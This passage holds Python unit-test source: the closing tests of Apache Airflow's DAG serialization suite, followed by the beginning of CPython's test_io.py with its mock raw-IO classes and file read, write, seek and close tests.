self.validate_deserialized_dag(json_dag, dag) serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag)) assert serialized_dag.edge_info == dag.edge_info @parameterized.expand( [ ("poke", False), ("reschedule", True), ] ) def test_serialize_sensor(self, mode, expect_custom_deps): from airflow.sensors.base import BaseSensorOperator class DummySensor(BaseSensorOperator): def poke(self, context): return False op = DummySensor(task_id='dummy', mode=mode, poke_interval=23) blob = SerializedBaseOperator.serialize_operator(op) if expect_custom_deps: assert "deps" in blob else: assert "deps" not in blob serialized_op = SerializedBaseOperator.deserialize_operator(blob) assert op.deps == serialized_op.deps @parameterized.expand( [ ({"on_success_callback": lambda x: print("hi")}, True), ({}, False), ] ) def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value): """ Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True. When the callback is not set, has_on_success_callback should not be stored in Serialized blob and so default to False on de-serialization """ dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if expected_value: assert "has_on_success_callback" in serialized_dag["dag"] else: assert "has_on_success_callback" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) assert deserialized_dag.has_on_success_callback is expected_value @parameterized.expand( [ ({"on_failure_callback": lambda x: print("hi")}, True), ({}, False), ] ) def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value): """ Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True. When the callback is not set, has_on_failure_callback should not be stored in Serialized blob and so default to False on de-serialization """ dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if expected_value: assert "has_on_failure_callback" in serialized_dag["dag"] else: assert "has_on_failure_callback" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) assert deserialized_dag.has_on_failure_callback is expected_value @parameterized.expand( [ ( ['task_1', 'task_5', 'task_2', 'task_4'], ['task_1', 'task_5', 'task_2', 'task_4'], ), ( {'task_1', 'task_5', 'task_2', 'task_4'}, ['task_1', 'task_2', 'task_4', 'task_5'], ), ( ('task_1', 'task_5', 'task_2', 'task_4'), ['task_1', 'task_5', 'task_2', 'task_4'], ), ( { "staging_schema": [ {"key:": "foo", "value": "bar"}, {"key:": "this", "value": "that"}, "test_conf", ] }, { "staging_schema": [ {"__type": "dict", "__var": {"key:": "foo", "value": "bar"}}, { "__type": "dict", "__var": {"key:": "this", "value": "that"}, }, "test_conf", ] }, ), ( {"task3": "test3", "task2": "test2", "task1": "test1"}, {"task1": "test1", "task2": "test2", "task3": "test3"}, ), ( ('task_1', 'task_5', 'task_2', 3, ["x", "y"]), ['task_1', 'task_5', 'task_2', 3, ["x", "y"]], ), ] ) def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output): """Test Serialized Sets are sorted while list and tuple preserve order""" serialized_obj = SerializedDAG._serialize(object_to_serialized) if isinstance(serialized_obj, dict) and "__type" in serialized_obj: serialized_obj = serialized_obj["__var"] assert serialized_obj == expected_output def test_kubernetes_optional(): """Serialisation / deserialisation continues to work without kubernetes installed""" def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0): if level == 0 and name.partition('.')[0] == 'kubernetes': raise ImportError("No module named 'kubernetes'") return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level) with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock: # load module from scratch, this does not replace any already imported # airflow.serialization.serialized_objects module in sys.modules spec = importlib.util.find_spec("airflow.serialization.serialized_objects") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) # if we got this far, the module did not try to load kubernetes, but # did it try to access airflow.kubernetes.*? imported_airflow = { c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.") } assert "kubernetes" not in imported_airflow # pod loading is not supported when kubernetes is not available pod_override = { '__type': 'k8s.V1Pod', '__var': PodGenerator.serialize_pod(executor_config_pod), } with pytest.raises(RuntimeError): module.BaseSerialization.from_dict(pod_override) # basic serialization should succeed module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
test_io.py
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import import_helper from test.support import os_helper from test.support import threading_helper from test.support import warnings_helper from test.support.os_helper import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): os_helper.unlink(os_helper.TESTFN) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(os_helper.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(os_helper.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with self.open(os_helper.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(os_helper.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(os_helper.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(os_helper.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(os_helper.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with warnings_helper.check_warnings(('', ResourceWarning)): f = MyFileIO(os_helper.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(os_helper.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w', closefd=False) def test_read_closed(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") with self.open(os_helper.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(os_helper.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(os_helper.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with warnings_helper.check_warnings(('', ResourceWarning)): f = self.FileIO(os_helper.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(os_helper.TESTFN, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(os_helper.TESTFN, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") fd = os.open(os_helper.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") check_path_succeeds(FakePath(os_helper.TESTFN)) check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN))) with self.open(os_helper.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(os_helper.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, 